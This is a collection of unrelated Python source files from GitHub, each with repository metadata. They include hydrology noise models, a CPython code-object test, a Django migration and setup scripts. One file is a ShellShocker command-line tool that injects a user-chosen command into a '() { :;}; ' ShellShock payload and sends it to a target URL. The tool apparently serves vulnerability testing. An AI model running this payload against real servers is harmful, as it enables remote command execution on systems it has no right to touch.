        -----
        Prefer setting parameters through the model instead.
        """
        self.parameters.loc[name, "pmin"] = value

    @set_parameter
    def _set_pmax(self, name, value):
        """Set the upper bound of a noise parameter.

        Notes
        -----
        Prefer setting parameters through the model instead.
        """
        self.parameters.loc[name, "pmax"] = value

    @set_parameter
    def _set_vary(self, name, value):
        """Set whether a noise parameter is varied during optimization.

        Notes
        -----
        Prefer setting parameters through the model instead.
        """
        self.parameters.loc[name, "vary"] = value

    def to_dict(self):
        """Serialize the model type for persistence."""
        return {"type": self._name}

    @staticmethod
    def weights(res, p):
        # Default: all observations weighted equally.
        return 1
class NoiseModel(NoiseModelBase):
    """Noise model with exponential decay of the residuals and weighting.

    Parameters
    ----------
    norm: boolean, optional
        Boolean to indicate whether weights are normalized according to
        the Von Asmuth and Bierkens (2005) paper. Default is True.

    Notes
    -----
    The noise [1]_ is computed as:

    .. math::

        v(t_1) = r(t_1) - r(t_0) * \\exp(- \\Delta t / \\alpha)

    and the weights as:

    .. math::

        w = 1 / \\sqrt{(1 - \\exp(-2 \\Delta t / \\alpha))}

    The unit of the alpha parameter is always days. The first noise value
    equals the first residual ($v(t=0)=r(t=0)$) and its weight is
    1 / sig_residuals (i.e., delt = infty). Weights may be normalized as in
    Von Asmuth and Bierkens (2005), optional.

    Differences compared to NoiseModelOld:

    1. First value is residual
    2. First weight is 1 / sig_residuals (i.e., delt = infty)
    3. Normalization of weights as in Von Asmuth and Bierkens (2005), optional

    References
    ----------
    .. [1] von Asmuth, J. R., and M. F. P. Bierkens (2005), Modeling
       irregularly spaced residual series as a continuous stochastic
       process, Water Resour. Res., 41, W12404, doi:10.1029/2004WR003726.
    """
    _name = "NoiseModel"

    def __init__(self, norm=True):
        NoiseModelBase.__init__(self)
        self.norm = norm
        self.nparam = 1
        self.set_init_parameters()

    @staticmethod
    def simulate(res, p):
        """Simulate noise from the residuals.

        Parameters
        ----------
        res: pandas.Series
            The residual series.
        p: array_like
            array_like object with the values as floats representing the
            model parameters. Here, only the alpha parameter is used.

        Returns
        -------
        noise: pandas.Series
            Series of the noise.
        """
        alpha = p[0]
        values = res.values
        # Time steps between consecutive observations, expressed in days.
        dt = np.diff(res.index.to_numpy()) / Timedelta("1D")
        decay = np.exp(-dt / alpha)
        # The first noise value is the first residual itself.
        noise = np.concatenate((values[:1], values[1:] - decay * values[:-1]))
        return Series(data=noise, index=res.index, name="Noise")

    def weights(self, res, p):
        """Method to calculate the weights for the noise.

        Parameters
        ----------
        res: pandas.Series
            Pandas Series with the residuals to compute the weights for. The
            Series index must be a DatetimeIndex.
        p: numpy.ndarray
            numpy array with the parameters used in the noise model.

        Returns
        -------
        w: pandas.Series
            Series of the weights.

        Notes
        -----
        Weights are

        .. math:: w = 1 / sqrt((1 - exp(-2 \\Delta t / \\alpha)))

        which are then normalized so that sum(w) = len(res)
        """
        alpha = p[0]
        # Prepend a huge time step so the first weight is 1 / sig_residuals.
        dt = np.append(1e12, np.diff(res.index.to_numpy()) / Timedelta("1D"))
        exp = np.exp(-2.0 / alpha * dt)  # single exponential, reused below
        w = 1 / np.sqrt(1.0 - exp)  # weights of noise, not noise^2
        if self.norm:
            # Normalization from Von Asmuth and Bierkens (2005).
            w = w * np.exp(np.sum(np.log(1.0 - exp)) / (2.0 * dt.size))
        return Series(data=w, index=res.index, name="noise_weights")
class ArmaModel(NoiseModelBase):
    """ARMA(1,1) Noise model to simulate the noise as defined in.
    [collenteur_2020]_.

    Notes
    -----
    Calculates the noise according to:

    .. math::

        \\upsilon_t = r_t - r_{t-1} e^{-\\Delta t/\\alpha} - \\upsilon_{t-1}
        e^{-\\Delta t/\\beta}

    The units of the alpha and beta parameters are always in days.

    Warnings
    --------
    This model has only been tested on regular time steps and should not be
    used for irregular time steps yet.

    References
    ----------
    .. [collenteur_2020] Collenteur, R., Bakker, M., Klammler, G., and Birk,
       S. (in review, 2020.) Estimating groundwater recharge from
       groundwater levels using non-linear transfer function noise models
       and comparison to lysimeter data, Hydrol. Earth Syst. Sci. Discuss.
       https://doi.org/10.5194/hess-2020-392
    """
    _name = "ArmaModel"

    def __init__(self):
        # Fail early (with guidance) if numba is not installed, since
        # calculate_noise below is jit-compiled.
        check_numba()
        NoiseModelBase.__init__(self)
        self.nparam = 2
        self.set_init_parameters()

    def set_init_parameters(self, oseries=None):
        # alpha: AR decay (days, must be positive); beta: MA decay, may be
        # negative — only its magnitude enters the exponential (see below).
        self.parameters.loc["noise_alpha"] = (10.0, 1e-9, np.inf, True,
                                              "noise")
        self.parameters.loc["noise_beta"] = (10.0, -np.inf, np.inf, True,
                                             "noise")

    def simulate(self, res, p):
        """Return the ARMA(1,1) noise series computed from the residuals."""
        alpha = p[0]
        beta = p[1]

        # Calculate the time steps
        odelt = np.diff(res.index.to_numpy()) / Timedelta("1D")
        a = self.calculate_noise(res.values, odelt, alpha, beta)
        return Series(index=res.index, data=a, name="Noise")

    @staticmethod
    @njit
    def calculate_noise(res, odelt, alpha, beta):
        # Numba-compiled sequential recursion; keep as a plain loop — the
        # recurrence on a[i-1] cannot be vectorized.
        # Create an array to store the noise
        a = np.zeros_like(res)
        a[0] = res[0]
        # pm carries the sign of beta so a negative beta flips the MA term
        # while the exponential always sees abs(beta).
        pm = beta / np.abs(beta)

        # We have to loop through each value
        for i in range(1, res.size):
            a[i] = res[i] - res[i - 1] * np.exp(-odelt[i - 1] / alpha) - \
                a[i - 1] * pm * np.exp(-odelt[i - 1] / np.abs(beta))
        return a
| {
"content_hash": "80aaffd7aeab2f4a4c2939c77ce9f91a",
"timestamp": "",
"source": "github",
"line_count": 265,
"max_line_length": 79,
"avg_line_length": 30.10566037735849,
"alnum_prop": 0.5765856104286788,
"repo_name": "pastas/pasta",
"id": "8f421148af39631ba51e9b36fdd47f4cc06fd071",
"size": "7978",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pastas/noisemodels.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "128118"
}
],
"symlink_target": ""
} |
"""This module includes tests of the code object representation.
>>> def f(x):
... def g(y):
... return x + y
... return g
...
>>> dump(f.func_code)
name: f
argcount: 1
names: ()
varnames: ('x', 'g')
cellvars: ('x',)
freevars: ()
nlocals: 2
flags: 3
consts: ('None', '<code object g>')
>>> dump(f(4).func_code)
name: g
argcount: 1
names: ()
varnames: ('y',)
cellvars: ()
freevars: ('x',)
nlocals: 1
flags: 19
consts: ('None',)
>>> def h(x, y):
... a = x + y
... b = x - y
... c = a * b
... return c
...
>>> dump(h.func_code)
name: h
argcount: 2
names: ()
varnames: ('x', 'y', 'a', 'b', 'c')
cellvars: ()
freevars: ()
nlocals: 5
flags: 67
consts: ('None',)
>>> def attrs(obj):
... print obj.attr1
... print obj.attr2
... print obj.attr3
>>> dump(attrs.func_code)
name: attrs
argcount: 1
names: ('attr1', 'attr2', 'attr3')
varnames: ('obj',)
cellvars: ()
freevars: ()
nlocals: 1
flags: 67
consts: ('None',)
>>> def optimize_away():
... 'doc string'
... 'not a docstring'
... 53
... 53L
>>> dump(optimize_away.func_code)
name: optimize_away
argcount: 0
names: ()
varnames: ()
cellvars: ()
freevars: ()
nlocals: 0
flags: 67
consts: ("'doc string'", 'None')
"""
import unittest
import weakref
import _testcapi
def consts(t):
    """Yield a doctest-safe sequence of object reprs."""
    for elt in t:
        text = repr(elt)
        if text.startswith("<code object"):
            # Code-object reprs embed addresses; normalize to just the name.
            text = "<code object %s>" % elt.co_name
        yield text
def dump(co):
    """Print out a text representation of a code object."""
    # Python 2 print statements; each attr name maps to a co_<attr>
    # attribute on the code object.
    for attr in ["name", "argcount", "names", "varnames", "cellvars",
                 "freevars", "nlocals", "flags"]:
        print "%s: %s" % (attr, getattr(co, "co_" + attr))
    # consts() normalizes code-object reprs so doctests stay stable.
    print "consts:", tuple(consts(co.co_consts))
class CodeTest(unittest.TestCase):
    """Tests for the C-API code-object constructor exposed via _testcapi."""

    def test_newempty(self):
        # code_newempty(filename, funcname, firstlineno) builds a minimal
        # empty code object; check the metadata round-trips.
        co = _testcapi.code_newempty("filename", "funcname", 15)
        self.assertEquals(co.co_filename, "filename")
        self.assertEquals(co.co_name, "funcname")
        self.assertEquals(co.co_firstlineno, 15)
class CodeWeakRefTest(unittest.TestCase):
    """Weak references to code objects must resolve and fire callbacks."""

    def test_basic(self):
        # Create a code object in a clean environment so that we know we have
        # the only reference to it left.
        namespace = {}
        exec "def f(): pass" in globals(), namespace
        f = namespace["f"]
        del namespace
        self.called = False
        def callback(code):
            self.called = True
        # f is now the last reference to the function, and through it, the code
        # object. While we hold it, check that we can create a weakref and
        # deref it. Then delete it, and check that the callback gets called and
        # the reference dies.
        coderef = weakref.ref(f.__code__, callback)
        self.assertTrue(bool(coderef()))
        del f
        self.assertFalse(bool(coderef()))
        self.assertTrue(self.called)
def test_main(verbose=None):
    """Run the doctests in this module's docstring plus the unittest cases."""
    from test.test_support import run_doctest, run_unittest
    from test import test_code
    run_doctest(test_code, verbose)
    run_unittest(CodeTest, CodeWeakRefTest)
if __name__ == "__main__":
    # Allow running this test module directly.
    test_main()
| {
"content_hash": "6d8ec2a8ea35e3f85cdaa057ead29d51",
"timestamp": "",
"source": "github",
"line_count": 147,
"max_line_length": 80,
"avg_line_length": 21.816326530612244,
"alnum_prop": 0.5871531025880885,
"repo_name": "fkolacek/FIT-VUT",
"id": "e83a919bcf5b960157d2ba93bb46a876fff74fd3",
"size": "3207",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "bp-revok/python/lib/python2.7/test/test_code.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "455326"
},
{
"name": "Awk",
"bytes": "8724"
},
{
"name": "Batchfile",
"bytes": "201"
},
{
"name": "Brainfuck",
"bytes": "83"
},
{
"name": "C",
"bytes": "5006938"
},
{
"name": "C++",
"bytes": "1835332"
},
{
"name": "CSS",
"bytes": "301045"
},
{
"name": "CoffeeScript",
"bytes": "46327"
},
{
"name": "Groff",
"bytes": "46766"
},
{
"name": "HTML",
"bytes": "937735"
},
{
"name": "Java",
"bytes": "552132"
},
{
"name": "JavaScript",
"bytes": "1742225"
},
{
"name": "Lua",
"bytes": "39700"
},
{
"name": "Makefile",
"bytes": "381793"
},
{
"name": "Objective-C",
"bytes": "4618"
},
{
"name": "PHP",
"bytes": "108701"
},
{
"name": "PLSQL",
"bytes": "22886"
},
{
"name": "Perl",
"bytes": "60353"
},
{
"name": "Python",
"bytes": "22084026"
},
{
"name": "QMake",
"bytes": "2660"
},
{
"name": "R",
"bytes": "1370"
},
{
"name": "Ragel in Ruby Host",
"bytes": "17993"
},
{
"name": "Ruby",
"bytes": "21607145"
},
{
"name": "Shell",
"bytes": "611321"
},
{
"name": "Tcl",
"bytes": "4920"
},
{
"name": "TeX",
"bytes": "561423"
},
{
"name": "VHDL",
"bytes": "49180"
},
{
"name": "Visual Basic",
"bytes": "481"
},
{
"name": "XSLT",
"bytes": "154638"
},
{
"name": "Yacc",
"bytes": "32788"
}
],
"symlink_target": ""
} |
"""
ShellShocker CLI
================
The CLI for ShellShocker.
Interfaces to **shellshocker.exploits.ShellShocker**, a ShellShock exploiter
"""
from shellshocker.exploits import ShellShocker # Import a shellshock payload generator
# and delivery device.
import click # Click is Armin Ronacher's new CLI framework. It's awesomesauce.
@click.command()
@click.argument('url')
@click.option('-v', '--verbose', is_flag=True, help='Make the tester more verbose for debugging')
@click.option('-c', '--commands', help='Command to inject into the payload')
@click.option('-p', '--payload', type=click.Choice(['traditional', 'new']), help='Choose between the original bug and the new one')
def test_site(url, verbose, commands, payload):
    """
    Test the URL `URL` for ShellShock vulnerability.
    """
    click.echo("Testing {url} with a standard payload using ShellShocker".format(url=url))

    if verbose:
        click.echo("Creating instance of exploit on {url}".format(url=url))
        if commands is None:
            click.echo("Using default commands")
        else:
            click.echo("Using commands {commands}".format(commands=commands))
        if payload is None:
            click.echo("Using default payload")
        else:
            click.echo("Using the {payload} payload".format(payload=payload))

    # Only the 'new' bug variant is unimplemented; 'traditional' and the
    # default both use the classic template below.
    if payload == 'new':
        raise NotImplementedError("Not supported yet")
    # Doubled braces survive str.format, producing the literal "() { :;};".
    payloadstring = '() {{ :;}}; {commands}'

    # Create a instance of the exploiter
    shocker = ShellShocker({'url': url, 'commands': commands, 'payload': payloadstring})

    if verbose:
        shocker.verbose = True
        click.echo("Sending exploit to {url}".format(url=url))

    # Is it exploitable?
    exploitable = shocker.exploitable()
    if exploitable:
        click.echo(click.style("{url} is exploitable".format(url=url), fg="red"))
    else:
        click.echo(click.style("{url} is not exploitable".format(url=url), fg="green"))
if __name__ == '__main__':
    """
    If this is being run as a script
    """
    # Hand control to the click-generated command.
    test_site()
| {
"content_hash": "048ac531e3cebdd2c909d50cec2be756",
"timestamp": "",
"source": "github",
"line_count": 60,
"max_line_length": 163,
"avg_line_length": 34.03333333333333,
"alnum_prop": 0.6816846229187071,
"repo_name": "ArchimedesPi/shellshocker",
"id": "ae8e1f431f05542dd894a0bee4c844de25b54f56",
"size": "2065",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "shellshocker.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "81412"
},
{
"name": "HTML",
"bytes": "5372"
},
{
"name": "Handlebars",
"bytes": "341"
},
{
"name": "JavaScript",
"bytes": "5912"
},
{
"name": "Python",
"bytes": "10131"
},
{
"name": "Shell",
"bytes": "64"
}
],
"symlink_target": ""
} |
from common.ulam_spiral import *
from common.primes import *
SIEVE = PrimeSieve(100000)
def prime_ratio_below(limit):
    """Return the side length of the first Ulam-spiral square whose
    diagonal prime ratio drops below ``limit``.

    Walks the spiral one ring at a time (side lengths 3, 5, 7, ...),
    accumulating how many of the diagonal corner values are prime.
    """
    corners_seen = 1  # the center value lies on both diagonals
    primes_seen = 0
    n = 3
    for corners in ulam_spiral_corners_except_center():
        # sum over a generator works on both Python 2 and 3;
        # len(filter(...)) would raise TypeError on Python 3.
        primes_seen += sum(1 for corner in corners if is_prime(corner))
        corners_seen += len(corners)
        if float(primes_seen) / corners_seen < limit:
            return n
        n += 2
"content_hash": "3ba1fef121ce521da103c3cc0ae8e1ff",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 55,
"avg_line_length": 25.375,
"alnum_prop": 0.625615763546798,
"repo_name": "plilja/project-euler",
"id": "f7db7bfa289d2983d0e1777a4c0c95ca7c7c3081",
"size": "406",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "problem_58/prime_diagonals.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "149781"
}
],
"symlink_target": ""
} |
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """South schema migration: adds the ``Subquery`` model.

    ``forwards`` creates the backing table; ``backwards`` drops it. The
    ``models`` dict is South's frozen snapshot of the ORM at the time this
    migration was generated — it is declarative data and must not be edited.
    """

    def forwards(self, orm):
        # Adding model 'Subquery'
        db.create_table('smra_portal_subquery', (
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('owned_by', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['smra_portal.UserProfile'])),
            ('part_of', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['smra_portal.VirtualCollection'])),
            ('name', self.gf('django.db.models.fields.CharField')(max_length=80)),
            ('query', self.gf('django.db.models.fields.CharField')(max_length=2048)),
        ))
        db.send_create_signal('smra_portal', ['Subquery'])

    def backwards(self, orm):
        # Deleting model 'Subquery'
        db.delete_table('smra_portal_subquery')

    # Frozen ORM snapshot (generated by South) — do not edit by hand.
    models = {
        'auth.group': {
            'Meta': {'object_name': 'Group'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        'auth.permission': {
            'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        'auth.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        'smra_portal.deadlink': {
            'Meta': {'object_name': 'DeadLink'},
            'date_accessed': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'parameter': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['smra_portal.MediaObjectParameter']", 'unique': 'True'}),
            'reason': ('django.db.models.fields.CharField', [], {'max_length': '400'})
        },
        'smra_portal.key': {
            'Meta': {'ordering': "['ident']", 'object_name': 'Key'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'ident': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '400'}),
            'media_object': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['smra_portal.MediaObject']", 'unique': 'True'}),
            'repos': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['smra_portal.Repository']"})
        },
        'smra_portal.mediaobject': {
            'Meta': {'object_name': 'MediaObject'},
            'description': ('django.db.models.fields.CharField', [], {'max_length': '400'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'repos': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['smra_portal.Repository']"}),
            'schemas': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['smra_portal.Schema']", 'through': "orm['smra_portal.MediaObjectParameterSet']", 'symmetrical': 'False'})
        },
        'smra_portal.mediaobjectparameter': {
            'Meta': {'ordering': "('name',)", 'object_name': 'MediaObjectParameter'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['smra_portal.ParameterName']"}),
            'paramset': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['smra_portal.MediaObjectParameterSet']"}),
            'value': ('django.db.models.fields.TextField', [], {})
        },
        'smra_portal.mediaobjectparameterset': {
            'Meta': {'ordering': "['-ranking']", 'object_name': 'MediaObjectParameterSet'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'media_object': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['smra_portal.MediaObject']"}),
            'ranking': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'schema': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['smra_portal.Schema']"})
        },
        'smra_portal.parametername': {
            'Meta': {'ordering': "['-ranking']", 'object_name': 'ParameterName'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
            'ranking': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'schema': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['smra_portal.Schema']"}),
            'type': ('django.db.models.fields.IntegerField', [], {'default': '1'})
        },
        'smra_portal.repository': {
            'Meta': {'object_name': 'Repository'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
            'system': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['smra_portal.System']"})
        },
        'smra_portal.schema': {
            'Meta': {'object_name': 'Schema'},
            'description': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '80'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.SlugField', [], {'default': "''", 'max_length': '50', 'db_index': 'True'}),
            'namespace': ('django.db.models.fields.URLField', [], {'max_length': '400'})
        },
        'smra_portal.subquery': {
            'Meta': {'object_name': 'Subquery'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
            'owned_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['smra_portal.UserProfile']"}),
            'part_of': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['smra_portal.VirtualCollection']"}),
            'query': ('django.db.models.fields.CharField', [], {'max_length': '2048'})
        },
        'smra_portal.system': {
            'Meta': {'object_name': 'System'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '80'})
        },
        'smra_portal.userprofile': {
            'Meta': {'object_name': 'UserProfile'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'})
        },
        'smra_portal.virtualcollection': {
            'Meta': {'object_name': 'VirtualCollection'},
            'description': ('django.db.models.fields.CharField', [], {'max_length': '400'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'key': ('django.db.models.fields.CharField', [], {'max_length': '400'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '400'}),
            'owned_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['smra_portal.UserProfile']"})
        }
    }

    complete_apps = ['smra_portal']
| {
"content_hash": "f2787b79132eb77b12e0731d892d319f",
"timestamp": "",
"source": "github",
"line_count": 149,
"max_line_length": 196,
"avg_line_length": 68.35570469798658,
"alnum_prop": 0.5501227295041728,
"repo_name": "tectronics/mavrec",
"id": "2c184261b9634e7182ad7962e8c1912aae724b59",
"size": "10203",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "smra/smra_portal/migrations/0016_auto__add_subquery.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "30199"
},
{
"name": "HTML",
"bytes": "42761"
},
{
"name": "JavaScript",
"bytes": "10786"
},
{
"name": "Python",
"bytes": "875078"
}
],
"symlink_target": ""
} |
from setuptools import setup, find_packages # Always prefer setuptools over distutils
from codecs import open # To use a consistent encoding
from os import path
import io
NAME = "python-constraint"

filename = "%s/version.py" % "constraint"
# Single-source version pattern: execute version.py to pull __version__,
# __author__, __email__, __license__ and __url__ into this namespace.
with open(filename) as f:
    exec(f.read())

here = path.abspath(path.dirname(__file__))
def readme():
    """Read and return the long description from README.rst (UTF-8)."""
    readme_path = path.join(here, "README.rst")
    with io.open(readme_path, "rt", encoding="UTF-8") as fh:
        return fh.read()
setup(
    name=NAME,
    # Version is single-sourced from constraint/version.py via the exec above.
    version=__version__,
    description="python-constraint is a module implementing support "
    "for handling CSPs (Constraint Solving Problems) over finite domain",
    long_description=readme(),
    url=__url__,
    author=__author__,
    author_email=__email__,
    license=__license__,
    # Trove classifiers, see
    # https://pypi.python.org/pypi?%3Aaction=list_classifiers
    classifiers=[
        "Development Status :: 3 - Alpha",
        "Environment :: Console",
        "Intended Audience :: Science/Research",
        "Operating System :: OS Independent",
        "Programming Language :: Cython",
        "Programming Language :: Python",
        "Programming Language :: Python :: 2.7",
        "Programming Language :: Python :: 3.4",
        "Programming Language :: Python :: 3.5",
        "Programming Language :: Python :: 3.6",
        "Topic :: Scientific/Engineering",
        "License :: OSI Approved :: BSD License",
    ],
    keywords="csp constraint solving problems problem solver",
    packages=find_packages(exclude=["contrib", "docs", "tests*"]),
    # No hard runtime dependencies.
    install_requires=[],
    # Optional dependency groups, installable via: pip install -e .[dev,test]
    extras_require={"dev": ["check-manifest", "nose"], "test": ["coverage", "nose"]},
)
| {
"content_hash": "610513dd2a6ae23e61368a6a533aa073",
"timestamp": "",
"source": "github",
"line_count": 99,
"max_line_length": 98,
"avg_line_length": 43.62626262626262,
"alnum_prop": 0.651308173188238,
"repo_name": "python-constraint/python-constraint",
"id": "77b02534f5880d1da34645aa7123d04d987ff7fe",
"size": "4366",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33261",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "63031"
}
],
"symlink_target": ""
} |
from django.core.management.base import BaseCommand
from optparse import make_option
from provisioning import okta
from provisioning.models import Okta
from litedesk.lib.airwatch import user
from litedesk.lib.airwatch import group
from provisioning.models import AirWatch
import json
class Command(BaseCommand):
    """Collect a user's Okta and AirWatch state and print it as JSON."""

    help = 'Get information about a user.'

    option_list = BaseCommand.option_list + (
        make_option('--username',
                    default="bruce.wayne",
                    help='Username to find. Default="bruce.wayne"'),
    )

    def handle(self, *args, **options):
        """Build {'okta': {...}, 'airwatch': {...}} for the given username."""
        username = options["username"]
        report = {'okta': {}, 'airwatch': {}}

        # Okta lookup: login is the username plus a fixed mail domain.
        okta_client = Okta.objects.get(tenant=1).get_client()
        okta_user = okta_client.get(okta.User, username + '@zeile12.de')
        if okta_user:
            okta_report = report['okta']
            okta_report['id'] = okta_user.id
            okta_report['status'] = okta_user.status
            okta_report['applications'] = [
                app['name'] for app in okta_client.user_applications(okta_user)
            ]

        # AirWatch lookup: account name matches the username directly.
        airwatch_client = AirWatch.objects.get(tenant=1).get_client()
        airwatch_user = user.User.get_remote(airwatch_client, username)
        if airwatch_user is not None:
            aw_report = report['airwatch']
            aw_report['id'] = airwatch_user.id
            aw_report['Status'] = airwatch_user.Status
            aw_report['applications'] = []

        self.stdout.write(json.dumps(report))
| {
"content_hash": "442c950b07bc3d5a43bd06ce5f59d47f",
"timestamp": "",
"source": "github",
"line_count": 48,
"max_line_length": 82,
"avg_line_length": 45.333333333333336,
"alnum_prop": 0.5946691176470589,
"repo_name": "litedesk/litedesk-webserver-provision",
"id": "96309fa61b40e5f914798aa872beed33e82ee420",
"size": "2833",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/tenants/management/commands/get_user.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "203433"
},
{
"name": "Shell",
"bytes": "2421"
}
],
"symlink_target": ""
} |
import logging
import signal
import asyncio
from functools import partial
from collections import defaultdict, namedtuple
from .utils.log import config_logs
from .packet import ControlPacket
from .protocol_factory import get_vyked_protocol
from .pinger import TCPPinger, HTTPPinger
from .utils.log import setup_logging
# Immutable record describing one service instance known to the registry.
Service = namedtuple('Service', ['name', 'version', 'dependencies', 'host', 'port', 'node_id', 'type'])
logger = logging.getLogger(__name__)
class Repository:
    """In-memory store of registered, pending and subscribed services.

    Keys into the internal maps are ``'service/version'`` strings built by
    :meth:`_get_full_service_name`.
    """

    def __init__(self):
        # "service/version" -> list of (host, port, node_id, type) tuples
        self._registered_services = defaultdict(list)
        # "service/version" -> list of node ids waiting for dependency activation
        self._pending_services = defaultdict(list)
        # "service/version" -> list of vendor descriptors it depends on
        self._service_dependencies = {}
        # service -> version -> endpoint -> list of subscriber entries
        self._subscribe_list = defaultdict(lambda: defaultdict(lambda: defaultdict(list)))

    def register_service(self, service):
        """Record *service* (a Service namedtuple) as registered and pending,
        remembering its dependency list the first time it is seen."""
        service_name = self._get_full_service_name(service.name, service.version)
        service_entry = (service.host, service.port, service.node_id, service.type)
        self._registered_services[service_name].append(service_entry)
        self._pending_services[service_name].append(service.node_id)
        if service.dependencies:
            # Keep the first declared dependency list; re-registrations of
            # further instances do not override it.
            self._service_dependencies.setdefault(service_name, service.dependencies)

    def add_pending_service(self, service, version, node_id):
        """Mark *node_id* of service/version as waiting for activation."""
        self._pending_services[self._get_full_service_name(service, version)].append(node_id)

    def get_pending_services(self):
        """Return [(name, version), ...] for services with pending instances."""
        return [self._split_key(k) for k in self._pending_services.keys()]

    def get_pending_instances(self, service, version):
        """Return the node ids of pending instances for service/version."""
        return self._pending_services.get(self._get_full_service_name(service, version), [])

    def remove_pending_instance(self, service, version, node_id):
        """Drop *node_id* from the pending list; forget the key once empty."""
